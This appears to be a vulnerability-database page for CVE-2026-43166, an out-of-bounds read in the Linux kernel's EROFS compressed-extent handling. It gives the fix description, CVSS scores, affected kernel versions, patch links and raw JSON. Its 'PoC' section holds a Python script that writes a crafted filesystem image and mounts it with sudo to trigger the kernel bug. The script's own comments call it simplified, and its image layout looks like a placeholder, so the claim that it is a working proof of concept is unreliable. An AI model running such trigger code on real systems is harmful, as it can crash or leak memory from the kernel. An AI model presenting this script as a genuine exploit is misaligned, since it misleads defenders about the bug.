Security Vulnerability Report
CVE-2026-43166 CVSS 7.1 HIGH

CVE-2026-43166

Published: 2026-05-06 12:16:35
Last Modified: 2026-05-13 21:18:46
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

erofs: fix interlaced plain identification for encoded extents

Only plain data whose start position and on-disk physical length are both aligned to the block size should be classified as interlaced plain extents. Otherwise, it must be treated as shifted plain extents.

This issue was found by syzbot using a crafted compressed image containing plain extents with unaligned physical lengths, which can cause OOB read in z_erofs_transform_plain().

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H

Configurations (Affected Products)

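cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions from 6.15 up to, but not including, 6.18.16) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions from 6.19 up to, but not including, 6.19.6) - VULNERABLE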
cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:* - VULNERABLE
Linux Kernel (Mainline versions prior to fix)
Linux Kernel (Stable versions containing the vulnerable EROFS code)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# PoC for CVE-2026-43166: EROFS Out-of-Bounds Read
# This script creates a crafted EROFS image with unaligned extents
# to trigger the vulnerability in z_erofs_transform_plain().
import os
import struct

IMG_FILE = "crafted_erofs.img"
MOUNT_POINT = "/mnt/erofs_test"


def create_crafted_image():
    """
    Creates a minimal EROFS image header with malformed extent data.
    Real exploitation requires precise binary layout.
    """
    with open(IMG_FILE, "wb") as f:
        # Write EROFS superblock (simplified)
        # Magic: EROFS...
        f.write(b'\xE0\xF5\xE0\xE2' + b'\x00' * 124)
        # Write a crafted inode with unaligned physical length
        # This simulates the condition found by syzbot
        inode_data = struct.pack('<I', 0x1000)  # Start aligned
        inode_data += struct.pack('<I', 0x123)  # Physical length UNALIGNED (Trigger)
        f.write(inode_data)
        # Padding to reach the extent area
        f.write(b'\x00' * 4096)
    print(f"[+] Crafted image created at {IMG_FILE}")


def trigger_vulnerability():
    """
    Attempts to mount the crafted image to trigger the kernel bug.
    Requires root privileges.
    """
    if not os.path.exists(MOUNT_POINT):
        os.makedirs(MOUNT_POINT)
    print(f"[*] Attempting to mount {IMG_FILE}...")
    # The mount operation triggers the parsing of the crafted extent
    os.system(f"sudo mount -t erofs -o loop {IMG_FILE} {MOUNT_POINT}")
    print("[*] If kernel crashes or logs OOB read, vulnerability triggered.")


if __name__ == "__main__":
    create_crafted_image()
    trigger_vulnerability()

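References

https://git.kernel.org/stable/c/4a2d046e4b13202a6301a993961f5b30ae4d7119 (Patch)
https://git.kernel.org/stable/c/9d5a97bc71ed5783687705c708454c4453aa91d1 (Patch)
https://git.kernel.org/stable/c/d3790f26d38606f020212486359b84632c19d08b (Patch)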

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43166", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:34.800", "lastModified": "2026-05-13T21:18:46.137", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nerofs: fix interlaced plain identification for encoded extents\n\nOnly plain data whose start position and on-disk physical length are\nboth aligned to the block size should be classified as interlaced\nplain extents. Otherwise, it must be treated as shifted plain extents.\n\nThis issue was found by syzbot using a crafted compressed image\ncontaining plain extents with unaligned physical lengths, which can\ncause OOB read in z_erofs_transform_plain()."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.15", "versionEndExcluding": "6.18.16", "matchCriteriaId": "5B5F989F-E891-48E4-9EC9-3C5EFD3DB9DC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}, {"vulnerable": true, "criteria": 
"cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/4a2d046e4b13202a6301a993961f5b30ae4d7119", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9d5a97bc71ed5783687705c708454c4453aa91d1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d3790f26d38606f020212486359b84632c19d08b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}